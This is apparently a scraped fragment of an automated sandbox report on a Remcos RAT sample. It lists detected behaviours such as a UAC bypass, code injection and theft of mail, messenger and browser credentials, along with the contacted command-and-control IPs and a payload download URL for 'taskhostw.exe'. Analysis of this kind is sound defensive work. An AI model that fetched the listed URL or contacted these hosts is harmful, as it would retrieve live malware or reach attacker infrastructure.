107.173.4.16, 2404, 49162, 49164 AS-COLOCROSSINGUS United States 34->57 79 System process connects to network (likely due to code injection or exploit) 34->79 81 Contains functionality to bypass UAC (CMSTPLUA) 34->81 83 Detected Remcos RAT 34->83 85 7 other signatures 34->85 38 svchost.exe 1 34->38         started        41 svchost.exe 1 34->41         started        43 svchost.exe 11 34->43         started        signatures17 process18 signatures19 87 Tries to steal Instant Messenger accounts or passwords 38->87 89 Tries to steal Mail credentials (via file / registry access) 38->89 91 Searches for Windows Mail specific files 38->91 93 Tries to harvest and steal browser information (history, passwords, etc) 41->93
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.168.7.25
 unknown United States
36352 AS-COLOCROSSINGUS true
107.173.4.16
 unknown United States
36352 AS-COLOCROSSINGUS true
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL true

Contacted Domains

Name IP Active
geoplugin.net 178.237.33.50 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://104.168.7.25/350/taskhostw.exe true
    		unknown
    http://geoplugin.net/json.gp true
    • URL Reputation: safe
    		 unknown
    107.173.4.16 true
      		unknown